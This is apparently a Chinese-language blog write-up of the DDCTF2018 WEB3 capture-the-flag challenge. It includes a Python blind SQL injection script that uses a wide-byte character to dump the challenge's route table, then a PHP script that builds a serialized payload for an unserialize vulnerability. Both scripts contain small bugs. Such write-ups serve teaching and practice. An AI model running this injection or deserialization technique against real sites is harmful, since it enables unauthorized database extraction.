这一题的题目,十分明显的告诉我们了,跟编码有关,并且在源码中放了一个百度链接。

https://wenku.baidu.com/view/bd29b7b3fd0a79563c1e72f7.html

 

参考了:宽字节注入深入研究

最后对应找出了字符串。

并写出了对应的注入脚本:

import requests
res = ""

for j in range(1,1000):
    for i in range(32,128):
        url = "http://116.85.48.105:5033/ab393ca3-0736-4ac3-8fb5-5461d803ea87/well/getmessage/廄' or (ascii(substr((SELECT group_concat(concat(id,0x3a,pattern,0x3a,action,0x3a,rulepass)) from route_rules),{0},1))={1})%23".format(j,i)
        while True:
            try:
                content = requests.get(url).text
            except:
                continue
            break

        if "test1" in content:
            flag += chr(i)
            print(res)
            break
    if i == 127:
        exit()
print(res)

通过这个注入,可以得到题目的所有路由:

id pattern action rulepass
1 get*/:u/well/getmessage/:s Well#getmessage cd4229e671a8830debfcbb049a23399c
12 get*/:u/justtry/self/:s JustTry#self 5ed16f9c7c27cb846eaf15c19fe40093
13 post*/:u/justtry/try JustTry#try 3228ad498d5a20d1d22d6a4a15fed4d2
15 static/bootstrap/css/backup.css static/bootstrap/css/backup.zip

看到有一个backup.zip,访问 static/bootstrap/css/backup.css即可下载下来。

于是得到了题目的部分源码!

可以看到Justtry.php这个文件的try方法,明显存在反序列化漏洞,接下来就是构造payload得到flag。

<?php namespace Index\Helper; 
    class Test{ 
        public $user_uuid; 
        public $fl; 
        public function __destruct(){
               this->getflag('ctfuser', $this->user_uuid);
    }

    public function getflag($m = 'ctfuser', $u = 'default')
    {
        $user=array(
            'name' => $m,
            'id' => $u
        );
        //懒了直接输出给你们了
        $this->fl = new flag();
        echo 'DDCTF{}';
    }
}

class Flag{
    public $sql;
    public function __construct()
    {
        $this->sql=new SQL();
    }
}

class SQL{

    public $dbc;
    public $pdo;

}
class Justtry
{
    function ttt($serialize)
    {
        print "PlainText:\n";
        unserialize(urldecode($serialize));
    }
}
$object = new Test();
$object->user_uuid="ab393ca3-0736-4ac3-8fb5-5461d803ea87";
$object->fl = new flag();
echo (serialize($object)."\n");
echo urlencode(serialize($object));

echo "\n\n\n\n\n\n";
$obj = new Justtry();
$obj->ttt(urlencode(serialize($object)));

 

随即得到了反序列化payload





本文链接地址: DDCTF2018 WEB3 注入的奥妙 WRITEUP

原创文章,转载请注明: 转载自Lz1y's Blog

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.